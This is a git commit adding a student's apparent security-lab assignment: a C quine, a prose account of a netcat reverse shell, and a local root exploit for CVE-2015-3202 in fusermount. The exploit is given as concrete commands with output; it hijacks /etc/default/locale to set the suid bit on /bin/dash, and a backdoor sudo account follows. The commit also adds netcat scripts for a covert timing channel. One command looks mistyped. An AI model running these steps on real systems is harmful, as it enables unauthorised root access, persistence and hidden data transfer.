diff options
| author | Camil Staps | 2015-12-14 10:25:09 +0000 |
|---|---|---|
| committer | Camil Staps | 2015-12-14 10:25:09 +0000 |
| commit | 346407a55f00111a675304433ff5a7ee19569098 (patch) | |
| tree | c0a6662dfc9796b842ad92b8e0938933b318ce63 | |
| parent | Finish assignment 4 (diff) | |
Finish assignment 5
| -rw-r--r-- | CamilStaps-s4498062-Assignment-5/ex1.c | 1 | ||||
| -rw-r--r-- | CamilStaps-s4498062-Assignment-5/ex2 | 28 | ||||
| -rw-r--r-- | CamilStaps-s4498062-Assignment-5/ex3/readme | 10 | ||||
| -rwxr-xr-x | CamilStaps-s4498062-Assignment-5/ex3/receive.sh | 14 | ||||
| -rwxr-xr-x | CamilStaps-s4498062-Assignment-5/ex3/send.sh | 16 |
5 files changed, 69 insertions, 0 deletions
diff --git a/CamilStaps-s4498062-Assignment-5/ex1.c b/CamilStaps-s4498062-Assignment-5/ex1.c new file mode 100644 index 0000000..2596f16 --- /dev/null +++ b/CamilStaps-s4498062-Assignment-5/ex1.c @@ -0,0 +1 @@ +int main(void){char *s="int main(void){char *s=%c%s%c;printf(s,0x22,s,0x22);return 0;}";printf(s,0x22,s,0x22);return 0;} diff --git a/CamilStaps-s4498062-Assignment-5/ex2 b/CamilStaps-s4498062-Assignment-5/ex2 new file mode 100644 index 0000000..023e137 --- /dev/null +++ b/CamilStaps-s4498062-Assignment-5/ex2 @@ -0,0 +1,28 @@ +a + There is not much to explain here.. we open a listening netcat in the first terminal and the command second terminal opens a connection to it from the server we should attack, and executes /bin/bash. + + We then have a shell for www-data in the first terminal. + +c + I used https://www.exploit-db.com/exploits/37089/ which exploits CVE-2015-3202. It exploits a bug in fusermount which allows us to overwrite some file with root rights. We then overwrite /etc/bash.bashrc or /etc/default/locale or so to point to a script in /tmp, in which we do something that we want to be done with root rights. I used chmod 4755 /bin/dash, as suggested there. Then next time root logs in (in the case of /etc/bash.bashrc) or some cron job running with root rights sources /etc/default/locale, the exploit is executed. You can them come back and find /bin/dash with u+s rights, so you can get root rights in that shell. + + I then created my own account (camil) with sudo rights so that I could clean up without losing root rights in case I would need it later. In particular, I removed the suid bit from /bin/dash so that others wouldn't find it and use it (e.g. find / -perm -u=s -type f 2>/dev/null) + + Concretely, the commands used were: + + $ printf "chmod 4755 /bin/dash" > /tmp/exploit + $ printf 755 /tmp/exploit + $ mkdir -p '/tmp/exploit||/tmp/exploit' + $ LIBMOUNT_MTAB=/etc/default/locale _FUSE_COMMFD=0 fusermount '/tmp/exploit||/tmp/exploit' + fusermount: failed to open /etc/fuse.conf: Permission denied + sending file descriptor: Socket operation on non-socket + $ cat /etc/default/locale + /dev/fuse /tmp/exploit||/tmp/exploit fuse rw,nosuid,nodev,user=www-data 0 0 + + When locale is sourced, /dev/fuse /tmp/exploit will be piped to /tmp/exploit, so the latter is executed. + + I had /etc/bash.bashrc changed as well since sometime on Saturday, but unfortunately root didn't login. I also found that using /etc/bash.bashrc isn't very stealthy, because if you're using bash as unprivileged user, you see: + + bash: /dev/fuse: Permission denied + chmod: changing permissions of `/bin/dash': Operation not permitted + diff --git a/CamilStaps-s4498062-Assignment-5/ex3/readme b/CamilStaps-s4498062-Assignment-5/ex3/readme new file mode 100644 index 0000000..cb95949 --- /dev/null +++ b/CamilStaps-s4498062-Assignment-5/ex3/readme @@ -0,0 +1,10 @@ +The sender opens a port for a 1, doesn't do anything to send a 0. Obviously, the receiver should know the sender's IP address. + +Usage on the receiver's side: + + $ ./receive.sh + +Usage on the sender's side: + + $ echo 010101110110110 | ./send.sh + diff --git a/CamilStaps-s4498062-Assignment-5/ex3/receive.sh b/CamilStaps-s4498062-Assignment-5/ex3/receive.sh new file mode 100755 index 0000000..4944d9c --- /dev/null +++ b/CamilStaps-s4498062-Assignment-5/ex3/receive.sh @@ -0,0 +1,14 @@ +#!/bin/bash +SERVER=localhost +PORT=12345 + +while :; do + timeout 1 nc "$SERVER" "$PORT" 2>/dev/null + if [[ "$?" == "1" ]]; then + echo -n "0" + sleep 1 + else + echo -n "1" + fi +done + diff --git a/CamilStaps-s4498062-Assignment-5/ex3/send.sh b/CamilStaps-s4498062-Assignment-5/ex3/send.sh new file mode 100755 index 0000000..b0ad02d --- /dev/null +++ b/CamilStaps-s4498062-Assignment-5/ex3/send.sh @@ -0,0 +1,16 @@ +#!/bin/bash +PORT=12345 + +# For every input line +while IFS= read -r payload; do + # For every character + for (( i=0; i<${#payload}+1; i+=1 )); do + char="${payload:$i:1}" + if [[ "$char" == "1" ]]; then + timeout 1 nc -lp "$PORT" >/dev/null + else + sleep 1 + fi + done +done + |